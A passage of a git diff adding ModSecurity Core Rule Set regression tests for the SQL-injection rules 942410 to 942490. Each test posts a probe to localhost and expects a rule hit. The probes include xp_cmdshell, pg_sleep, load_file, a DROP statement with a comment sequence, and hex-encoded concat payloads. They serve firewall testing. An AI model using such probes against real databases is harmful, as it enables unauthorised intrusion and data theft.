dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-48 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-49 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-50 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-51 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-52 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-53 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-54 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + 
log_contains: id "942410" + - test_title: 942410-55 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-56 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-57 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-58 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-59 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-60 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-61 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-62 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 
+ uri: "/" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-63 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-64 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-65 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-66 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-67 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-68 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-69 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-70 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-71 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-72 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-73 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-74 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-75 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-76 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-77 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-78 + desc: "SQL Injection Attack" + stages: + - stage: + input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-79 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-80 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "quarter. (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-81 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-82 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-83 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-84 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-85 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "REPLACE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-86 + desc: "SQL Injection Attack" + stages: + - stage: 
+ input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-87 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-88 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-89 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-90 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sin (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-91 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-92 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-93 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-94 + desc: "SQL Injection Attack" + 
stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-95 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-96 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-97 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-98 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-99 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-100 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-101 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - 
test_title: 942410-102 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-103 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-104 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-105 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-106 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-107 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-108 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-109 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: 
"pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-110 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-111 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-112 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-113 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-114 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-115 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-116 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-117 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-118 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml new file mode 100644 index 000000000..983c35592 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942420.yaml +tests: + - test_title: 942420-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml new file mode 100644 index 000000000..1cc28a1c3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml 
@@ -0,0 +1,22 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942421.yaml
+tests:
+ - test_title: 942421-1
+ desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Cookie: "cookie=@@@@@@@@@@@@@"
+ method: GET
+ port: 80
+ uri: "/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942421"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
new file mode 100644
index 000000000..4fe810856
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942431.yaml
+tests:
+ - test_title: 942431-1
+ desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=-------------------&var2=whatever"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942431"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
new file mode 100644
index 000000000..39c906e2b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942440.yaml
+tests:
+ - test_title: 942440-1
+ desc: "SQL Comment Sequence"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?var=DROP%20sampletable%3b--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942440"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
new file mode 100644
index 000000000..7bd207301
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
@@ -0,0 +1,82 @@
+---
+meta:
+ author: "William Woodson"
+ description: None
+ enabled: true
+ name: 942450.yaml
+tests:
+ - test_title: 942450-1
+ desc: "SQL Hex Encoding"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ method: POST
+ uri: "/"
+ data: "var=%5c0xf00dsdfdsa"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942450"
+ - test_title: 942450-2
+ desc: "SQL Hex Encoding"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ method: POST
+ uri: "/"
+ data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942450"
+ - test_title: 942450-3
+ desc: "SQL Hex Encoding"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ method: POST
+ uri: "/"
+ data: "var=select%200x616263"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942450"
+ - test_title: 942450-4
+ desc: "SQL Hex Encoding - negative"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ method: POST
+ uri: "/"
+ data: "var=IHRlc3Q0xAcF"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942450"
+ - test_title: 942450-5
+ desc: "SQL Hex Encoding - negative"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ method: POST
+ uri: "/"
+ data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942450"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
new file mode 100644
index 000000000..857a7a3cb
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
@@ -0,0 +1,157 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942470.yaml +tests: + - test_title: 942470-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-8 + desc: "SQL Injection Attack" + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml new file mode 100644 index 000000000..fcc26c6ce --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Jose Nazario" + description: None + enabled: true + name: 942480.yaml +tests: + - test_title: 942480-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + method: POST + port: 80 + version: HTTP/1.0 + output: + log_contains: "id \"942480" 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
new file mode 100644
index 000000000..4d04d75d8
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
@@ -0,0 +1,336 @@
+---
+meta:
+ author: "Christoph Hansen"
+ description: None
+ enabled: true
+ name: 942490.yaml
+tests:
+ - test_title: 942490-1
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=%22%60%20%2A%20123"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-2
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "' ', 10"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-3
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "'', '', '', '', '', '', '', '', 13"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-4
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "`>65"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942490"
+ - test_title: 942490-5
+ desc: "classic SQL injection probings 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
